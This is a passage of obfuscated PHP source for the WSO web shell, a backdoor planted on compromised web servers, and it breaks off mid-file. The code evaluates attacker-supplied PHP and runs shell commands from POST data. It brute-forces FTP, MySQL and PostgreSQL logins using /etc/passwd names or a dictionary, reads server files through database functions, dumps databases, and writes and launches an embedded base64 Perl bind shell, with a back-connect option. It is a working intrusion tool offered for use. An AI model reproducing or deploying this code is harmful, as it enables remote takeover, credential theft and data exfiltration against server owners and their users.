goto Vqm3n;
PiFXF:
header(
"Content-Disposition: attachment; filename=" .
basename($_POST["p1"])
);
goto rpfQA;
kEAXk:
ob_start("ob_gzhandler", 4096);
goto PiFXF;
Vqm3n:
}
exit();
}
goto tJhrh;
XQqyZ:
echo "<span>Name:</span> " .
htmlspecialchars(@basename($_POST["p1"])) .
" <span>Size:</span> " .
(is_file($_POST["p1"])
? wsoViewSize(filesize($_POST["p1"]))
: "-") .
" <span>Permission:</span> " .
wsoPermsColor($_POST["p1"]) .
" <span>Owner/Group:</span> " .
$uid["name"] .
"/" .
$gid["name"] .
"<br>";
goto vLiGd;
lZIie:
}
goto w2GF1;
etiAC:
function wsoPerms($p)
{
goto kfyb8;
GUcgT:
$i .=
$p & 0x1
? ($p & 0x200
? "t"
: "x")
: ($p & 0x200
? "T"
: "-");
goto mshmE;
kfyb8:
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000) {
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
goto pqnZD;
GuUyD:
$i .= $p & 0x2 ? "w" : "-";
goto GUcgT;
Vg6sO:
$i .= $p & 0x10 ? "w" : "-";
goto vneDY;
I8J2d:
$i .=
$p & 0x40
? ($p & 0x800
? "s"
: "x")
: ($p & 0x800
? "S"
: "-");
goto yfJn7;
pqnZD:
$i .= $p & 0x100 ? "r" : "-";
goto FjLaa;
yfJn7:
$i .= $p & 0x20 ? "r" : "-";
goto Vg6sO;
FjLaa:
$i .= $p & 0x80 ? "w" : "-";
goto I8J2d;
vneDY:
$i .=
$p & 0x8
? ($p & 0x400
? "s"
: "x")
: ($p & 0x400
? "S"
: "-");
goto e6Pjl;
e6Pjl:
$i .= $p & 0x4 ? "r" : "-";
goto GuUyD;
mshmE:
return $i;
goto MofP7;
MofP7:
}
goto eRZM6;
j4eIF:
if (
!isset(
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
)
) {
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
] = (bool) $default_use_ajax;
}
goto EoPoZ;
qZOco:
if (isset($_POST["c"])) {
@chdir($_POST["c"]);
}
goto sO9OV;
tZUOM:
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
$os = "win";
} else {
$os = "nix";
}
goto LqaMO;
B8b3D:
function actionRC()
{
if (!@$_POST["p1"]) {
$a = [
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get(
"safe_mode"
),
];
echo serialize($a);
} else {
eval($_POST["p1"]);
}
}
goto dPSqc;
Gop14:
$disable_functions = @ini_get(
"disable_functions"
);
goto oE6Ue;
oHsYW:
function actionPhp()
{
goto s1VTJ;
ujMFQ:
wsoFooter();
goto dfcYP;
s1VTJ:
if (isset($_POST["ajax"])) {
goto jtGxB;
XiIjv:
eval($_POST["p1"]);
goto pcNS1;
cL7XN:
ob_start();
goto XiIjv;
keRr1:
exit();
goto cNits;
t7wh1:
echo strlen($temp), "
", $temp;
goto keRr1;
pcNS1:
$temp =
"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"\xa
\'\x0"
) .
"';\xa";
goto t7wh1;
jtGxB:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto cL7XN;
cNits:
}
goto IyHRn;
wcs04:
echo "</pre></div>";
goto ujMFQ;
Sz7n2:
echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" .
(!empty($_POST["p1"])
? htmlspecialchars($_POST["p1"])
: "") .
"</textarea><input type=submit value=Eval style="margin-top:5px">";
goto bE4Om;
t2vRD:
wsoHeader();
goto om2si;
oWPfu:
if (!empty($_POST["p1"])) {
goto uFjl_;
uFjl_:
ob_start();
goto XYFVS;
qDLEK:
echo htmlspecialchars(ob_get_clean());
goto Zre8T;
XYFVS:
eval($_POST["p1"]);
goto qDLEK;
Zre8T:
}
goto wcs04;
IyHRn:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto t2vRD;
om2si:
if (isset($_POST["p2"]) && $_POST["p2"] == "info") {
goto u6Vem;
u6Vem:
echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
goto ClNOj;
ClNOj:
ob_start();
goto Z0UYj;
WpKFt:
$tmp = preg_replace(
[
"!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU",
"!td, th {(.*)}!msiU",
"!<img[^>]+>!msiU",
],
[
"",
".e, .v, .h, .h th {$1}",
"",
],
$tmp
);
goto AiOL8;
Z0UYj:
phpinfo();
goto pDREm;
pDREm:
$tmp = ob_get_clean();
goto WpKFt;
AiOL8:
echo str_replace("<h1", "<h2", $tmp) .
"</div><br>";
goto xiXKW;
xiXKW:
}
goto Sz7n2;
bE4Om:
echo " <input type=checkbox name=ajax value=1 " .
($_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX</form><pre id=PhpOutput style="" .
(empty($_POST["p1"])
? "display:none;"
: "") .
"margin-top:5px;" class=ml1>";
goto oWPfu;
dfcYP:
}
goto N84uU;
jB3VR:
$default_charset = "Windows-1251";
goto fj9OS;
rTVjF:
function actionLogout()
{
setcookie(
md5($_SERVER["HTTP_HOST"]),
"",
time() - 3600
);
die("bye!");
}
goto i6mTz;
DbGtY:
function actionBruteforce()
{
goto uMF9i;
hSv50:
if (isset($_POST["proto"])) {
goto jX4Q5;
UnBlf:
if ($_POST["type"] == 1) {
$temp = @file("/etc/passwd");
if (is_array($temp)) {
foreach ($temp as $line) {
goto vXxXO;
zFefs:
if (@$_POST["reverse"]) {
goto S2jvF;
oahSQ:
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
goto rxcry;
S2jvF:
$tmp = "";
goto oahSQ;
rxcry:
++$attempts;
goto TfDj5;
TfDj5:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$tmp
)
) {
$success++;
echo "<b>" .
htmlspecialchars($line[0]) .
"</b>:" .
htmlspecialchars($tmp);
}
goto lNTnA;
lNTnA:
}
goto i039d;
b2CQw:
++$attempts;
goto i1_FI;
i1_FI:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$line[0]
)
) {
$success++;
echo "<b>" .
htmlspecialchars($line[0]) .
"</b>:" .
htmlspecialchars($line[0]) .
"<br>";
}
goto zFefs;
vXxXO:
$line = explode(":", $line);
goto b2CQw;
i039d:
}
}
} elseif ($_POST["type"] == 2) {
$temp = @file($_POST["dict"]);
if (is_array($temp)) {
foreach ($temp as $line) {
goto kf0wF;
NI_R6:
if (
wsoBruteForce(
$server[0],
@$server[1],
$_POST["login"],
$line
)
) {
$success++;
echo "<b>" .
htmlspecialchars($_POST["login"]) .
"</b>:" .
htmlspecialchars($line) .
"<br>";
}
goto JCePy;
kf0wF:
$line = trim($line);
goto byC2k;
byC2k:
++$attempts;
goto NI_R6;
JCePy:
}
}
}
goto VERJt;
jX4Q5:
echo "<h1>Results</h1><div class=content><span>Type:</span> " .
htmlspecialchars($_POST["proto"]) .
" <span>Server:</span> " .
htmlspecialchars($_POST["server"]) .
"<br>";
goto LBJl4;
VERJt:
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
goto U2KZG;
ObcWW:
$server = explode(":", $_POST["server"]);
goto UnBlf;
LBJl4:
if ($_POST["proto"] == "ftp") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto w1bnC;
MJhTf:
@ftp_close($fp);
goto efLYK;
efLYK:
return $res;
goto zU7bZ;
aqJAG:
$res = @ftp_login($fp, $login, $pass);
goto MJhTf;
w1bnC:
$fp = @ftp_connect($ip, $port ? $port : 21);
goto NYGOQ;
NYGOQ:
if (!$fp) {
return false;
}
goto aqJAG;
zU7bZ:
}
} elseif ($_POST["proto"] == "mysql") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto nwkI1;
tqKjk:
@mysqli_close($res);
goto lNvU5;
nwkI1:
$res = @mysqli_connect(
$ip . ":" . $port ? $port : 3306,
$login,
$pass
);
goto tqKjk;
lNvU5:
return $res;
goto h_hcl;
h_hcl:
}
} elseif ($_POST["proto"] == "pgsql") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto ucMyA;
DgnPW:
@pg_close($res);
goto qQMP_;
qQMP_:
return $res;
goto N73qn;
ucMyA:
$str =
"host='" .
$ip .
"' port='" .
$port .
"' user='" .
$login .
"' password='" .
$pass .
"' dbname=postgres";
goto szIUy;
szIUy:
$res = @pg_connect($str);
goto DgnPW;
N73qn:
}
}
goto px18Z;
px18Z:
$success = 0;
goto aKdd5;
aKdd5:
$attempts = 0;
goto ObcWW;
U2KZG:
}
goto NNTq8;
NNTq8:
echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" .
"<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" .
"<input type=hidden name=c value="" .
htmlspecialchars($GLOBALS["cwd"]) .
"">" .
"<input type=hidden name=a value="" .
htmlspecialchars($_POST["a"]) .
"">" .
"<input type=hidden name=charset value="" .
htmlspecialchars($_POST["charset"]) .
"">" .
"<span>Server:port</span></td>" .
"<td><input type=text name=server value="127.0.0.1"></td></tr>" .
"<tr><td><span>Brute type</span></td>" .
"<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" .
"<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" .
"<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" .
"<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" .
"<td><input type=text name=login value="root"></td></tr>" .
"<tr><td><span>Dictionary</span></td>" .
"<td><input type=text name=dict value="" .
htmlspecialchars($GLOBALS["cwd"]) .
"passwd.dic"></td></tr></table>" .
"</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>";
goto HIh7o;
uMF9i:
wsoHeader();
goto hSv50;
HIh7o:
echo "</div><br>";
goto wlwoF;
wlwoF:
wsoFooter();
goto p3uSI;
p3uSI:
}
goto wVO2a;
uf2tU:
$default_use_ajax = true;
goto jB3VR;
d62j5:
function wsoEx($in)
{
$out = shell_exec($in);
return $out;
}
goto yXkOt;
wVO2a:
function actionSql()
{
goto pXyEP;
WqMW0:
if (@$_POST["type"] == "pgsql") {
echo "selected";
}
goto bZFnU;
qgUXu:
echo "</div>";
goto G862b;
G862b:
wsoFooter();
goto gsteZ;
bZFnU:
echo ">PostgreSql</option></select></td>
\xa<td><input type=text name=sql_host value="" .
(empty($_POST["sql_host"])
? "localhost"
: htmlspecialchars($_POST["sql_host"])) .
""></td>\xd
<td><input type=text name=sql_login value="" .
(empty($_POST["sql_login"])
? "root"
: htmlspecialchars(
$_POST["sql_login"]
)) .
""></td>
\xa<td><input type=text name=sql_pass value="" .
(empty($_POST["sql_pass"])
? ""
: htmlspecialchars($_POST["sql_pass"])) .
""></td><td>";
goto dxViD;
dxViD:
$tmp =
"<input type=text name=sql_base value=''>";
goto L_VIT;
Auorx:
echo "</td>\xd\xa\x9 \x9 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>\xd\xa <td><input type=checkbox name=sql_count value='on'" .
(empty($_POST["sql_count"])
? ""
: " checked") .
"> count the number of rows</td>\xd\xa \x9</tr>\xd\xa\x9 </table>
\x9<script>\xd
s_db='" .
@addslashes($_POST["sql_base"]) .
"';\xd\xa function fs(f) {\xd\xa if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xd
if(f.p1) f.p1.value='';\xd
if(f.p2) f.p2.value='';\xd\xa if(f.p3) f.p3.value='';\xd\xa }
\xa }\xd
\x9 \x9function st(t,l) {
\xa\x9\x9 \x9d.sf.p1.value = 'select';\xd
\x9\x9 d.sf.p2.value = t;
\xa if(l && d.sf.p3) d.sf.p3.value = l;\xd
d.sf.submit();
}
\x9\x9function is() {\xd\xa \x9\x9 for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xd\xa\x9\x9 \x9d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xd\xa\x9\x9 }\xd\xa \x9</script>";
goto omuNC;
omuNC:
if (isset($db) && $db->link) {
goto wQooQ;
v7m0f:
if (!empty($_POST["sql_base"])) {
goto Rgzyg;
MvXdD:
if (
@$_POST["p1"] == "query" &&
!empty($_POST["p2"])
) {
$db->query(@$_POST["p2"]);
if ($db->res !== false) {
goto p5kAe;
FQZVM:
while ($item = $db->fetch()) {
if (!$title) {
goto UHBlV;
UHBlV:
echo "<tr>";
goto hcvnp;
krRoK:
$line = 2;
goto OQDWZ;
hcvnp:
foreach ($item as $key => $value) {
echo "<th>" .
$key .
"</th>";
}
goto gYEfe;
s133J:
$title = true;
goto vdCQU;
vdCQU:
echo "</tr><tr>";
goto krRoK;
gYEfe:
reset($item);
goto s133J;
OQDWZ:
}
echo "<tr class="l" .
$line .
"">";
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo "<td>" .
nl2br(htmlspecialchars($value)) .
"</td>";
}
}
echo "</tr>";
}
goto LonsA;
c36CC:
$line = 1;
goto FQZVM;
LonsA:
echo "</table>";
goto zCgso;
vhOW_:
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">";
goto c36CC;
p5kAe:
$title = false;
goto vhOW_;
zCgso:
} else {
echo "<div><b>Error:</b> " .
htmlspecialchars($db->error()) .
"</div>";
}
}
goto f63uD;
f63uD:
echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
goto l03yb;
Rgzyg:
$db->selectdb($_POST["sql_base"]);
goto QW0Ku;
uEPKu:
if (@$_POST["p1"] == "select") {
goto mAhBO;
IznKf:
if ($_POST["p3"] > 1) {
echo " <a href=# onclick='st("" .
$_POST["p2"] .
"", " .
($_POST["p3"] - 1) .
")'>< Prev</a>";
}
goto ZoHo3;
l2Xna:
$pages = ceil($num["n"] / 30);
goto ZYT4s;
mAhBO:
$_POST["p1"] = "query";
goto e_ZJ4;
ZYT4s:
echo "<script>d.sf.onsubmit=function(){st("" .
$_POST["p2"] .
"", d.sf.p3.value)}</script><span>" .
$_POST["p2"] .
"</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" .
(int) $_POST["p3"] .
">";
goto uoZpe;
Es7M3:
$num = $db->fetch();
goto l2Xna;
uoZpe:
echo " of {$pages}";
goto IznKf;
rczWG:
$_POST["p3"]--;
goto bhg9h;
e_ZJ4:
$_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1;
goto Lo_J9;
nEjUO:
echo "<br><br>";
goto IQ9di;
bhg9h:
if ($_POST["type"] == "pgsql") {
$_POST["p2"] =
"SELECT * FROM " .
$_POST["p2"] .
" LIMIT 30 OFFSET " .
$_POST["p3"] * 30;
} else {
$_POST["p2"] =
"SELECT * FROM `" .
$_POST["p2"] .
"` LIMIT " .
$_POST["p3"] * 30 .
",30";
}
goto nEjUO;
Lo_J9:
$db->query(
"SELECT COUNT(*) as n FROM " .
$_POST["p2"]
);
goto Es7M3;
ZoHo3:
if ($_POST["p3"] < $pages) {
echo " <a href=# onclick='st("" .
$_POST["p2"] .
"", " .
($_POST["p3"] + 1) .
")'>Next ></a>";
}
goto rczWG;
IQ9di:
}
goto MvXdD;
EHE8j:
echo "</textarea><br/><input type=submit value='Execute'>";
goto epF3V;
bDaxO:
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST["sql_count"])) {
$n = $db->fetch(
$db->query(
"SELECT COUNT(*) as n FROM " .
$value .
""
)
);
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" .
$value .
"'> <a href=# onclick="st('" .
$value .
"',1)">" .
$value .
"</a>" .
(empty($_POST["sql_count"])
? " "
: " <small>({$n["n"]})</small>") .
"</nobr><br>";
}
goto M5p5r;
l03yb:
if (
!empty($_POST["p2"]) &&
$_POST["p1"] != "loadfile"
) {
echo htmlspecialchars($_POST["p2"]);
}
goto EHE8j;
M5p5r:
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
goto uEPKu;
QW0Ku:
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
goto ss2k2;
epF3V:
echo "</td></tr>";
goto DdhHe;
ss2k2:
$tbls_res = $db->listTables();
goto bDaxO;
DdhHe:
}
goto E6Jlf;
E6Jlf:
echo "</table></form><br/>";
goto eqSj_;
HfqGV:
if (@$_POST["p1"] == "loadfile") {
$file = $db->loadFile($_POST["p2"]);
echo "<br/><pre class=ml1>" .
htmlspecialchars($file["file"]) .
"</pre>";
}
goto OSIXi;
eqSj_:
if ($_POST["type"] == "mysql") {
$db->query(
"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"
);
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
}
goto HfqGV;
wQooQ:
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
goto v7m0f;
OSIXi:
} else {
echo htmlspecialchars($db->error());
}
goto qgUXu;
eZaK7:
echo "\xd
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xd\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'><input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>\xd\xa<td><select name='type'><option value='mysql' ";
goto XNXvh;
L_VIT:
if (isset($_POST["sql_host"])) {
if (
$db->connect(
$_POST["sql_host"],
$_POST["sql_login"],
$_POST["sql_pass"],
$_POST["sql_base"]
)
) {
goto zzoGT;
zzoGT:
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
goto CgrPi;
hq4SA:
echo "</select>";
goto pJJmI;
CgrPi:
$db->listDbs();
goto KKbSG;
MV0Hw:
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo "<option value="" .
$value .
"" " .
($value == $_POST["sql_base"]
? "selected"
: "") .
">" .
$value .
"</option>";
}
goto hq4SA;
KKbSG:
echo "<select name=sql_base><option value=''></option>";
goto MV0Hw;
pJJmI:
} else {
echo $tmp;
}
} else {
echo $tmp;
}
goto Auorx;
pXyEP:
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case "mysql":
if (
$this->link = @mysqli_connect(
$host,
$user,
$pass,
$dbname
)
) {
return true;
}
break;
case "pgsql":
goto urMgZ;
NmhxL:
if (
$this->link = @pg_connect(
"host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}"
)
) {
return true;
}
goto q24c2;
q24c2:
break;
goto pMERe;
urMgZ:
$host = explode(":", $host);
goto dzuNv;
dzuNv:
if (!$host[1]) {
$host[1] = 5432;
}
goto NmhxL;
pMERe:
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "mysql":
if (@mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "mysql":
return $this->res = @mysqli_query($this->link, $str);
break;
case "pgsql":
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
goto ndkAm;
Ccrqd:
return false;
goto kFQe3;
ndkAm:
$res = func_num_args() ? func_get_arg(0) : $this->res;
goto uBsjP;
uBsjP:
switch ($this->type) {
case "mysql":
return @mysqli_fetch_assoc($res);
break;
case "pgsql":
return @pg_fetch_assoc($res);
break;
}
goto Ccrqd;
kFQe3:
}
function listDbs()
{
switch ($this->type) {
case "mysql":
return $this->query(
"SHOW databases"
);
break;
case "pgsql":
return $this->res = $this->query(
"SELECT datname FROM pg_database WHERE datistemplate!='t'"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "mysql":
return $this->res = $this->query(
"SHOW TABLES"
);
break;
case "pgsql":
return $this->res = $this->query(
"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "mysql":
return @mysqli_error();
break;
case "pgsql":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case "mysql":
if (
function_exists(
"mysql,_set_charset"
)
) {
return @mysqli_set_charset($str, $this->link);
} else {
$this->query(
"SET CHARSET " .
$str
);
}
break;
case "pgsql":
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case "mysql":
return $this->fetch(
$this->query(
"SELECT LOAD_FILE('" .
addslashes($str) .
"') as file"
)
);
break;
case "pgsql":
goto hIi1_;
hIi1_:
$this->query(
"CREATE TABLE wso2(file text);COPY wso2 FROM '" .
addslashes($str) .
"';select file from wso2;"
);
goto Vq5gq;
RFQO1:
return ["file" => implode("
", $r)];
goto Xccn3;
Vq5gq:
$r = [];
goto B2PD8;
B2PD8:
while ($i = $this->fetch()) {
$r[] = $i["file"];
}
goto ytmal;
ytmal:
$this->query(
"drop table wso2"
);
goto RFQO1;
Xccn3:
break;
goto hza_Y;
hza_Y:
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case "mysql":
goto A8Rtf;
XOdpv:
$i = 0;
goto nXX1H;
dgmAw:
if (!$head) {
if ($fp) {
fwrite($fp, ";
");
} else {
echo ";\xa
";
}
}
goto xuWj3;
nXX1H:
$head = true;
goto rdh_q;
vLJ0E:
$sql = $create[1] . ";\xa";
goto GZCGH;
e85gZ:
$this->query(
"SELECT * FROM `" .
$table .
"`"
);
goto XOdpv;
A8Rtf:
$res = $this->query(
"SHOW CREATE TABLE `" .
$table .
"`"
);
goto WbvCG;
rdh_q:
while ($item = $this->fetch()) {
$sql = "";
if ($i % 1000 == 0) {
$head = true;
$sql = ";\xa\xa";
}
$columns = [];
foreach ($item as $k => $v) {
if ($v === null) {
$item[$k] = "NULL";
} elseif (is_int($v)) {
$item[$k] = $v;
} else {
$item[$k] =
"'" .
@mysqli_real_escape_string($v) .
"'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql .=
"INSERT INTO `" .
$table .
"` (" .
implode(", ", $columns) .
") VALUES
(" .
implode(", ", $item) .
")";
$head = false;
} else {
$sql .=
"\xa ,(" .
implode(", ", $item) .
")";
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
goto dgmAw;
xuWj3:
break;
goto I2Pib;
WbvCG:
$create = mysqli_fetch_array($res);
goto vLJ0E;
GZCGH:
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
goto e85gZ;
I2Pib:
case "pgsql":
goto yK1Fh;
q4AGJ:
break;
goto M_aLo;
YU12f:
while ($item = $this->fetch()) {
$columns = [];
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql =
"INSERT INTO " .
$table .
" (" .
implode(", ", $columns) .
") VALUES (" .
implode(", ", $item) .
");" .
"
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
goto q4AGJ;
yK1Fh:
$this->query(
"SELECT * FROM " .
$table
);
goto YU12f;
M_aLo:
}
return false;
}
}
goto S2jsy;
nON0D:
wsoHeader();
goto eZaK7;
S2jsy:
$db = new DbClass($_POST["type"]);
goto b5FFe;
xAAjI:
echo ">MySql</option><option value='pgsql' ";
goto WqMW0;
b5FFe:
if (@$_POST["p2"] == "download") {
goto q3uCo;
dKSpy:
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
goto SW_1d;
SW_1d:
if (empty($_POST["file"])) {
goto UlEph;
NKAxm:
foreach ($_POST["tbl"] as $v) {
$db->dump($v);
}
goto gTeuJ;
UlEph:
ob_start("ob_gzhandler", 4096);
goto wxi0r;
wxi0r:
header(
"Content-Disposition: attachment; filename=dump.sql"
);
goto JFnky;
gTeuJ:
exit();
goto o3LDH;
JFnky:
header(
"Content-Type: text/plain"
);
goto NKAxm;
o3LDH:
} elseif ($fp = @fopen($_POST["file"], "w")) {
goto HVjKn;
sI6XB:
fclose($fp);
goto JcIQa;
JcIQa:
unset($_POST["p2"]);
goto eJ6NS;
HVjKn:
foreach ($_POST["tbl"] as $v) {
$db->dump($v, $fp);
}
goto sI6XB;
eJ6NS:
} else {
die(
"<script>alert("Error! Can't open file");window.history.back(-1)</script>"
);
}
goto V4cuJ;
q3uCo:
$db->connect(
$_POST["sql_host"],
$_POST["sql_login"],
$_POST["sql_pass"],
$_POST["sql_base"]
);
goto G1BTq;
G1BTq:
$db->selectdb($_POST["sql_base"]);
goto dKSpy;
V4cuJ:
}
goto nON0D;
XNXvh:
if (@$_POST["type"] == "mysql") {
echo "selected";
}
goto xAAjI;
gsteZ:
}
goto BTyYB;
M9YJl:
$_POST = WSOstripslashes($_POST);
goto ocXfq;
BTyYB:
function actionNetwork()
{
goto ZoVmx;
unkZP:
$bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
goto PvgFx;
y9LP4:
if (isset($_POST["p1"])) {
goto oL5si;
oL5si:
function cf($f, $t)
{
($w = @fopen($f, "w")) or
@function_exists(
"file_put_contents"
);
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
goto O2j7_;
O2j7_:
if ($_POST["p1"] == "bpp") {
goto OF3WF;
SvfsQ:
unlink("/tmp/bp.pl");
goto zB2bw;
l42lD:
sleep(1);
goto YdT1I;
YdT1I:
echo "<pre class=ml1>{$out}
" .
wsoEx(
"ps aux | grep bp.pl"
) .
"</pre>";
goto SvfsQ;
P3N6B:
$out = wsoEx(
"perl /tmp/bp.pl " .
$_POST["p2"] .
" 1>/dev/null 2>&1 &"
);
goto l42lD;
OF3WF:
cf("/tmp/bp.pl", $bind_port_p);
goto P3N6B;
zB2bw:
}
goto mmghY;
mmghY:
if ($_POST["p1"] == "bcp") {
goto KdsjF;
EYep1:
unlink("/tmp/bc.pl");
goto vnHPj;
cueL2:
sleep(1);
goto rbk8c;
rbk8c:
echo "<pre class=ml1>{$out}
" .
wsoEx(
"ps aux | grep bc.pl"
) .
"</pre>";
goto EYep1;
KdsjF:
cf("/tmp/bc.pl", $back_connect_p);
goto JIcLb;
JIcLb:
$out = wsoEx(
"perl /tmp/bc.pl " .
$_POST["p2"] .
" " .
$_POST["p3"] .
" 1>/dev/null 2>&1 &"
);
goto cueL2;
vnHPj:
}
goto HmOsb;
HmOsb:
}
goto JZOTa;
QtVUX:
wsoFooter();
goto r_ZsG;
ZoVmx:
wsoHeader();
goto ui6gf;
PvgFx:
